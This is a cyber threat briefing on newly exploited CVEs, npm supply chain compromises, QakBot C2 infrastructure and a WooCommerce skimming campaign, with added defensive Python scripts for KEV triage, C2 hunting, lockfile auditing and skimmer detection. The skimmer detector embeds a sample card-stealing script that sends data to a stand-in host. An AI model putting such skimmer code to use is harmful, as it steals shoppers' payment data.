Cyber Threat Briefing
DELTA — CHANGES SINCE LAST BRIEFING
- CISA added CVE-2026-42897 (Microsoft Exchange XSS) to KEV, confirming active exploitation.
- Cisco Catalyst SD-WAN CVE-2026-20182 also added to KEV with exploitation in the wild and an imminent remediation deadline.
- New supply chain compromises reported, including malicious node‑ipc packages and the TanStack Mini Shai-Hulud incident.
- QakBot C2 infrastructure (50.16.16.211:443) remains active.
THREAT LEVEL ASSESSMENT
The overall threat environment remains CRITICAL, driven by active exploitation of Microsoft Exchange (CVE-2026-42897) and Cisco Catalyst SD‑WAN (CVE-2026-20182), both of which give attackers high-value footholds (mail infrastructure and the network control plane respectively). Concurrent supply chain compromises (node‑ipc, TanStack), the Kazuar P2P update, and the ongoing skimming campaign against WordPress Funnel Builder sites raise systemic risk. Active QakBot command‑and‑control infrastructure further increases the likelihood of compromise across sectors.
CRITICAL VULNERABILITIES
| CVE | Product | CVSS | Status | Impact |
|---|---|---|---|---|
| CVE-2020-37228 | iDS6 DSSPro Digital Signage System | 9.8 | Not in KEV | Authentication bypass: the CAPTCHA value can be retrieved, defeating the brute‑force protection on login. |
| CVE-2020-37239 | libbabl 0.1.62 | 9.8 | Not in KEV | Memory corruption; allows the library's double‑free protections to be bypassed. |
| CVE-2021-47952 | python jsonpickle 2.0.0 | 9.8 | Not in KEV | Remote code execution via deserialization of attacker‑controlled JSON. |
| CVE-2026-42897 | Microsoft Exchange Server | Not yet published | KEV — Actively Exploited | XSS via crafted email, leading to arbitrary code execution. |
ACTIVE EXPLOITS & KEV
| CVE | Product | Added | Remediation Due | Notes |
|---|---|---|---|---|
| CVE-2026-42897 | Microsoft Exchange Server | 2026‑05‑15 | 2026‑05‑29 | Confirmed exploitation; XSS enabling code execution. |
| CVE-2026-20182 | Cisco Catalyst SD‑WAN Controller | 2026‑05‑14 | 2026‑05‑17 | Authentication bypass used to obtain admin access. |
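KEV deadlines are only useful if they are tied to the assets that actually carry the affected products. The script below is an added example, not part of this briefing: it indexes a feed in the shape of CISA's known_exploited_vulnerabilities.json (the excerpt is constructed here and mirrors the field names of the real feed), cross-references it against a hypothetical scanner-derived inventory, and sorts the exposed hosts by days remaining before the CISA remediation due date. Host names, the inventory and the reference date are assumptions.

```python
"""Cross-reference an asset inventory against a CISA KEV-format feed.

Added example, not part of the briefing. KEV_FEED_JSON is a constructed
excerpt that uses the field names of CISA's known_exploited_vulnerabilities.json
(cveID, vendorProject, product, dateAdded, dueDate, knownRansomwareCampaignUse);
the inventory and the reference date are assumptions for illustration.
"""
import json
from datetime import date

# Constructed excerpt in the shape of the CISA KEV JSON feed.
KEV_FEED_JSON = json.dumps({
    "title": "CISA Catalog of Known Exploited Vulnerabilities",
    "vulnerabilities": [
        {
            "cveID": "CVE-2026-42897",
            "vendorProject": "Microsoft",
            "product": "Exchange Server",
            "dateAdded": "2026-05-15",
            "dueDate": "2026-05-29",
            "knownRansomwareCampaignUse": "Unknown",
        },
        {
            "cveID": "CVE-2026-20182",
            "vendorProject": "Cisco",
            "product": "Catalyst SD-WAN Controller",
            "dateAdded": "2026-05-14",
            "dueDate": "2026-05-17",
            "knownRansomwareCampaignUse": "Unknown",
        },
    ],
})

# Hypothetical inventory: host -> CVEs a vulnerability scanner reported on it.
INVENTORY = {
    "exch01.corp.example": ["CVE-2026-42897"],
    "sdwan-ctl.corp.example": ["CVE-2026-20182"],
    "wiki01.corp.example": ["CVE-2021-47952"],  # not in KEV, so not urgent
}


def load_kev(feed_json: str) -> dict:
    """Index KEV entries by CVE ID."""
    feed = json.loads(feed_json)
    return {v["cveID"]: v for v in feed["vulnerabilities"]}


def kev_exposure(inventory: dict, kev: dict, today: str) -> list:
    """Return one row per (host, CVE) pair present in KEV, most urgent first.

    `today` is an ISO date; days_left is negative once the due date has passed.
    """
    today_d = date.fromisoformat(today)
    rows = []
    for host, cves in inventory.items():
        for cve in cves:
            entry = kev.get(cve)
            if entry is None:
                continue  # not in KEV: handled by normal patch cadence
            due = date.fromisoformat(entry["dueDate"])
            rows.append({
                "host": host,
                "cve": cve,
                "product": f'{entry["vendorProject"]} {entry["product"]}',
                "due": entry["dueDate"],
                "days_left": (due - today_d).days,
                "overdue": due < today_d,
            })
    rows.sort(key=lambda r: r["days_left"])
    return rows


if __name__ == "__main__":
    kev = load_kev(KEV_FEED_JSON)
    for r in kev_exposure(INVENTORY, kev, today="2026-05-18"):
        flag = "OVERDUE" if r["overdue"] else f'{r["days_left"]}d left'
        print(f'{r["host"]:26} {r["cve"]:16} {r["product"]:32} due {r["due"]} {flag}')
```

Against the real feed, replace KEV_FEED_JSON with the downloaded JSON and INVENTORY with the scanner export; the overdue flag is what to escalate, since it corresponds to a missed federal remediation deadline.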
MALWARE & THREAT ACTORS
QakBot: One active C2 endpoint remains online (50.16.16.211:443, first seen 2025‑12‑30). QakBot operations continue to support credential harvesting, lateral movement, and ransomware staging. Its persistence highlights ongoing botnet resilience despite previous takedown operations.
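A single live C2 endpoint is a hunt query, not just a blocklist entry. The following is an added example (not from the briefing): it parses Zeek conn.log records using the #fields header, matches destinations against the 50.16.16.211:443 indicator from the page, and summarises per internal host the hit count, bytes sent and the average interval between connections, which is how a periodic beacon stands out. The log lines and the internal addresses are constructed for illustration.

```python
"""Hunt Zeek conn.log for traffic to the QakBot C2 named in the briefing.

Added example, not part of the briefing. The indicator (50.16.16.211:443)
comes from the page; the log excerpt and the 10.20.x.x hosts are constructed.
"""
from collections import defaultdict

# Indicator from the briefing as (id.resp_h, id.resp_p).
C2_INDICATORS = {("50.16.16.211", 443)}

# Constructed Zeek conn.log excerpt (tab-separated, #fields header as Zeek writes it).
CONN_LOG = (
    "#fields\tts\tuid\tid.orig_h\tid.orig_p\tid.resp_h\tid.resp_p\tproto\tservice\tduration\torig_bytes\tresp_bytes\tconn_state\n"
    "1767100000.123\tCk1\t10.20.3.14\t49812\t50.16.16.211\t443\ttcp\tssl\t12.3\t1540\t820\tSF\n"
    "1767100060.456\tCk2\t10.20.3.14\t49820\t50.16.16.211\t443\ttcp\tssl\t11.9\t1532\t796\tSF\n"
    "1767100075.001\tCk3\t10.20.7.2\t51000\t203.0.113.7\t443\ttcp\tssl\t0.8\t920\t4200\tSF\n"
    "1767100120.789\tCk4\t10.20.3.14\t49833\t50.16.16.211\t443\ttcp\tssl\t12.1\t1548\t810\tSF\n"
    "1767100130.555\tCk5\t10.20.9.9\t53011\t50.16.16.211\t80\ttcp\thttp\t0.5\t-\t1200\tSF\n"
)


def parse_conn_log(text: str):
    """Yield one dict per record, keyed by the column names in the #fields header."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#fields"):
            fields = line.split("\t")[1:]
            continue
        if not line or line.startswith("#"):
            continue
        if fields is None:
            raise ValueError("conn.log has no #fields header")
        yield dict(zip(fields, line.split("\t")))


def _num(value: str, cast):
    """Zeek writes '-' for unset numeric fields; treat those as zero."""
    return cast(value) if value != "-" else cast(0)


def hunt_c2(text: str, indicators=C2_INDICATORS) -> dict:
    """Summarise, per source host, connections to the C2 indicators.

    An exact (ip, port) match is 'high' confidence; traffic to the C2 IP on
    another port is kept as 'medium' so it is reviewed rather than dropped.
    """
    c2_ips = {ip for ip, _ in indicators}
    hits = defaultdict(lambda: {"count": 0, "first": None, "last": None,
                                "bytes_out": 0, "confidence": "medium"})
    for rec in parse_conn_log(text):
        dst = (rec["id.resp_h"], int(rec["id.resp_p"]))
        if dst[0] not in c2_ips:
            continue
        h = hits[rec["id.orig_h"]]
        ts = float(rec["ts"])
        h["count"] += 1
        h["first"] = ts if h["first"] is None else min(h["first"], ts)
        h["last"] = ts if h["last"] is None else max(h["last"], ts)
        h["bytes_out"] += _num(rec["orig_bytes"], int)
        if dst in indicators:
            h["confidence"] = "high"
    for h in hits.values():
        # Mean gap between connections; a near-constant value suggests a beacon.
        h["avg_interval"] = (h["last"] - h["first"]) / (h["count"] - 1) if h["count"] > 1 else None
    return dict(hits)


if __name__ == "__main__":
    for host, h in hunt_c2(CONN_LOG).items():
        print(f"{host:14} hits={h['count']} bytes_out={h['bytes_out']} "
              f"avg_interval={h['avg_interval']} confidence={h['confidence']}")
```

Run it over a day of conn.log (zcat and pipe into parse_conn_log) and the hosts returned with confidence "high" are candidates for isolation and memory capture; the interval column is what distinguishes a beacon from a one-off lookup.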
Kazuar / Turla: Recent reporting confirms the Kazuar backdoor has evolved into a modular P2P botnet supporting stealth and long-term persistence. Capabilities include distributed command relays and multi‑stage data collection modules, enhancing Turla’s operational resilience.
node‑ipc supply chain compromise: Multiple malicious releases have been identified, embedding credential-stealing functionality targeting developer secrets. This elevates risk for CI/CD pipelines and enterprise development environments.
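The practical response to a compromised npm package is to find every copy of it in every lockfile, including copies nested under other dependencies, and confirm each one is a version you have reviewed and was fetched from the registry you expect. The script below is an added example, not part of the briefing or of node‑ipc itself. The lockfile is constructed, and because the briefing does not list which node‑ipc releases were malicious, the vetted-version list and the allowed registry host are assumptions: anything not on them is flagged for review rather than declared malicious.

```python
"""Audit an npm lockfile for every installation of a watched package.

Added example, not part of the briefing. LOCKFILE_JSON is constructed;
VETTED_VERSIONS and ALLOWED_REGISTRY_HOSTS are assumed policy values.
"""
import json
from urllib.parse import urlparse

# Constructed package-lock.json (lockfileVersion 3 layout). node-ipc appears
# twice: at top level and nested under another dependency, which is the copy
# a quick `npm ls` glance tends to miss.
LOCKFILE_JSON = json.dumps({
    "name": "shop-frontend",
    "lockfileVersion": 3,
    "packages": {
        "": {"name": "shop-frontend", "version": "1.0.0"},
        "node_modules/node-ipc": {
            "version": "9.1.1",
            "resolved": "https://registry.npmjs.org/node-ipc/-/node-ipc-9.1.1.tgz",
            "integrity": "sha512-AAAA",
        },
        "node_modules/some-tool": {
            "version": "2.3.0",
            "resolved": "https://registry.npmjs.org/some-tool/-/some-tool-2.3.0.tgz",
            "integrity": "sha512-BBBB",
        },
        "node_modules/some-tool/node_modules/node-ipc": {
            "version": "11.0.0",
            "resolved": "https://mirror.example.net/node-ipc-11.0.0.tgz",
            "integrity": "sha512-CCCC",
        },
    },
})

# Assumed policy: versions this organisation has reviewed, and the only
# registry host installs may be resolved from.
VETTED_VERSIONS = {"node-ipc": {"9.1.1"}}
ALLOWED_REGISTRY_HOSTS = {"registry.npmjs.org"}


def installs_of(lock: dict, name: str):
    """Yield (path, entry) for every installation of `name` in the lockfile.

    lockfileVersion 2/3 list every install under "packages" keyed by path;
    lockfileVersion 1 nests them under "dependencies", so walk that tree instead.
    """
    if "packages" in lock:
        for path, entry in lock["packages"].items():
            if path.split("node_modules/")[-1] == name:
                yield path, entry
        return

    def walk(deps, prefix):
        for dep, entry in deps.items():
            path = f"{prefix}node_modules/{dep}"
            if dep == name:
                yield path, entry
            yield from walk(entry.get("dependencies", {}), path + "/")

    yield from walk(lock.get("dependencies", {}), "")


def audit_lockfile(lock_json: str, name: str,
                   vetted=VETTED_VERSIONS, hosts=ALLOWED_REGISTRY_HOSTS) -> list:
    """Return one finding per install of `name`; an empty reasons list means it passed."""
    lock = json.loads(lock_json)
    findings = []
    for path, entry in installs_of(lock, name):
        version = entry.get("version")
        resolved = entry.get("resolved", "")
        host = urlparse(resolved).hostname
        reasons = []
        if version not in vetted.get(name, set()):
            reasons.append(f"version {version} not on vetted list")
        if host not in hosts:
            reasons.append(f"resolved from unexpected host {host}")
        if not entry.get("integrity"):
            reasons.append("no integrity hash recorded")
        findings.append({"path": path, "version": version, "resolved": resolved, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in audit_lockfile(LOCKFILE_JSON, "node-ipc"):
        status = "OK" if not f["reasons"] else "; ".join(f["reasons"])
        print(f'{f["path"]:50} {f["version"]:8} {status}')
```

Run it across every repository's package-lock.json in CI; a non-empty reasons list on a package under active compromise is a build-breaking finding, and the nested install path tells you which direct dependency pulled the copy in.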
Funnel Builder exploitation: Active exploitation of WordPress Funnel Builder plugin vulnerabilities continues, injecting JavaScript skimmers into WooCommerce checkout pages to harvest payment card data.
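Whatever the plugin vulnerability used to plant it, a checkout skimmer ends up as a script on the checkout page that was not there before, so the detection is a baseline comparison of that page's scripts. The code below is an added example, not part of the briefing: it collects every script element from a constructed WooCommerce checkout page, flags external scripts whose host is outside an assumed allowlist, and flags inline scripts that both read card fields and use encoding or obfuscation primitives. The shop hostname, the allowlist and the regular expressions are assumptions a site owner would tune to their own baseline.

```python
"""Triage the scripts on a WooCommerce checkout page for injected skimmer code.

Added example, not part of the briefing. CHECKOUT_HTML is constructed; the
first-party host, allowlist and heuristics are assumptions to tune per site.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

SHOP_HOST = "shop.example"                            # assumed first-party origin
ALLOWED_SCRIPT_HOSTS = {SHOP_HOST, "js.stripe.com"}   # assumed checkout baseline

# Heuristics: an inline script that touches card fields and also uses
# decoding/obfuscation helpers has the classic shape of a skimmer.
CARD_FIELD_RE = re.compile(r"card[-_ ]?(number|num|cvc|cvv|expiry)|ccnum", re.I)
OBFUSCATION_RE = re.compile(r"\batob\(|fromCharCode|\beval\(|unescape\(|\\x[0-9a-f]{2}", re.I)

# Constructed page: two baseline scripts, one benign inline snippet, then an
# injected inline skimmer and a script pulled from an unknown host.
CHECKOUT_HTML = """
<html><body>
<script src="https://shop.example/wp-content/plugins/woocommerce/assets/js/frontend/checkout.min.js"></script>
<script src="https://js.stripe.com/v3/"></script>
<script>window.wcSettings = {currency: "USD"};</script>
<script>
var f=document.querySelector('#card-number'),c=document.querySelector('#card-cvc');
document.forms[0].addEventListener('submit',function(){
  new Image().src=atob('aHR0cHM6Ly8yMDMuMC4xMTMuNS9n')+'?d='+btoa(f.value+'|'+c.value)});
</script>
<script src="https://203.0.113.9/assets/jquery.min.js"></script>
</body></html>
"""


class ScriptCollector(HTMLParser):
    """Collect every <script>: external ones by src, inline ones by body text."""

    def __init__(self):
        super().__init__()
        self.scripts = []
        self._inline = None  # list of text chunks while inside an inline <script>

    def handle_starttag(self, tag, attrs):
        if tag != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.scripts.append({"src": src, "body": ""})
        else:
            self._inline = []

    def handle_data(self, data):
        if self._inline is not None:
            self._inline.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._inline is not None:
            self.scripts.append({"src": None, "body": "".join(self._inline)})
            self._inline = None


def triage_checkout_scripts(html: str, allowed_hosts=ALLOWED_SCRIPT_HOSTS) -> list:
    """Return scripts that deviate from the checkout baseline, in page order."""
    parser = ScriptCollector()
    parser.feed(html)
    parser.close()
    findings = []
    for s in parser.scripts:
        if s["src"]:
            # A relative src is served by the shop itself, so treat it as first party.
            host = urlparse(s["src"]).hostname or SHOP_HOST
            if host not in allowed_hosts:
                findings.append({"kind": "external", "src": s["src"],
                                 "reason": f"script host {host} not in baseline"})
        elif CARD_FIELD_RE.search(s["body"]) and OBFUSCATION_RE.search(s["body"]):
            findings.append({"kind": "inline", "src": None,
                             "reason": "inline script reads card fields and uses decoding/obfuscation"})
    return findings


if __name__ == "__main__":
    for f in triage_checkout_scripts(CHECKOUT_HTML):
        print(f'{f["kind"]:8} {f["src"] or "<inline>"}  {f["reason"]}')
```

Fetch the live checkout page on a schedule and diff the findings against the previous run; a new external host or a new card-reading inline script on a page that has not been deliberately changed is the signal. The obfuscation regex is deliberately loose and will need tuning against the site's own legitimate scripts.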
CYBER NEWS DIGEST
Microsoft Exchange zero‑day actively exploited (Bleeping Computer / The Hacker News). Microsoft confirmed ongoing attacks leveraging CVE‑2026‑42897, where crafted emails trigger XSS leading to remote code execution on on‑prem Exchange servers. Mitigations have been published, but patching is urgent due to the KEV designation.
Cisco SD‑WAN authentication bypass exploited for admin access (Dark Reading / The Hacker News). CVE‑2026‑20182, a maximum‑severity flaw, is used in live attacks enabling full administrative control of SD‑WAN controllers. CISA added the vulnerability to KEV with a hard remediation deadline of 2026‑05‑17.
node‑ipc npm package compromised to steal credentials (Bleeping Computer / The Hacker News). Newly published versions of node‑ipc were found embedding malware designed to exfiltrate sensitive developer credentials. The attack increases supply chain exposure across JavaScript ecosystems.
TanStack Mini Shai‑Hulud supply chain attack affects OpenAI employee devices (The Hacker News). Two internal OpenAI employee devices were compromised due to malicious upstream packages. No production systems or user data were affected, but the event underscores the expanding attack surface in software supply chains.
Canvas education platform breached and extorted (Krebs on Security). A major data extortion attack has disrupted education across the U.S., affecting school districts and universities. Attackers accessed systems tied to critical digital coursework infrastructure.
Russian-linked groups deploy updated Kazuar P2P botnet (Bleeping Computer / The Hacker News). Secret Blizzard/Turla shifted Kazuar into a P2P architecture enabling stealthier persistence and better evasion of takedown attempts, reinforcing long-term espionage capabilities.
Funnel Builder WordPress plugin actively exploited for credit card theft (Bleeping Computer / The Hacker News). Attackers inject malicious JavaScript into WooCommerce checkout pages, indicating an ongoing e‑commerce skimming campaign affecting numerous retailers.
Feds dismantle multiple IoT botnets (Krebs on Security). A coordinated international operation has disrupted four major botnets responsible for large-scale DDoS attacks, impacting more than three million compromised IoT devices.